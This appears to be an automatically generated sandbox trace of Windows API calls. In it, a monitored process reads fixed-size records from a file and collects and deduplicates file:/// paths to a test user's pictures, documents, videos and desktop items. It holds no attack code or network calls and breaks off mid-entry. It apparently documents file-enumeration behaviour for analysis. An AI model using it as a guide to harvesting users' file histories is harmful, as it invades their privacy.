SetFilePointer (in: hFile=0x9c, lDistanceToMove=23936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d80 [0085.736] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.736] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.736] SetFilePointer (in: hFile=0x9c, lDistanceToMove=23936, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5d80 [0085.736] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.736] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/QaG1IpiLh.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png" [0085.736] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 58 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.736] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.737] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 0x39 [0085.737] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e80 [0085.737] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.737] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.737] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24192, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5e80 [0085.737] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.737] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/lo28gAEmu_vvRwSD70/I4z-zBSF9hnTkBaKIP/3xOPVc16f2J.odp" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp" [0085.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 99 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.737] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.737] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 0x62 [0085.737] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f80 [0085.737] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.737] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.737] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24448, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5f80 [0085.737] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.738] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Desktop/qbgWPIV.swf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf" [0085.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 55 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.738] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 0x36 [0085.738] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6080 [0085.738] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.738] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.738] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6080 [0085.738] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.738] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Documents/Aq04%20pKplamwzt5%20J.rtf" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf" [0085.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 71 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned -1 [0085.738] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.739] wcslen (_String="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 0x46 [0085.739] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6180 [0085.739] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282f20, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f20*=0x8, lpOverlapped=0x0) returned 1 [0085.739] _memicmp (_Buf1=0x287178, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.739] SetFilePointer (in: hFile=0x9c, lDistanceToMove=24960, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6180 [0085.739] ReadFile (in: hFile=0x9c, lpBuffer=0x287178, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282f1c, lpOverlapped=0x0 | out: lpBuffer=0x287178*, lpNumberOfBytesRead=0x282f1c*=0x100, lpOverlapped=0x0) returned 1 [0085.739] _strlwr (in: _Str="file:///C:/Users/BGC6u8Oy%20yXGxkR/Pictures/MO6xTTvZ/Z2LyObAsS%20shWl/YAw0Ef1-rV%20J.png" | out: _Str="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png" [0085.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2871f9, cbMultiByte=-1, lpWideCharStr=0x282f78, cchWideChar=8192 | out: lpWideCharStr="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 89 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned -1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.739] wcscmp (_String1="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.739] 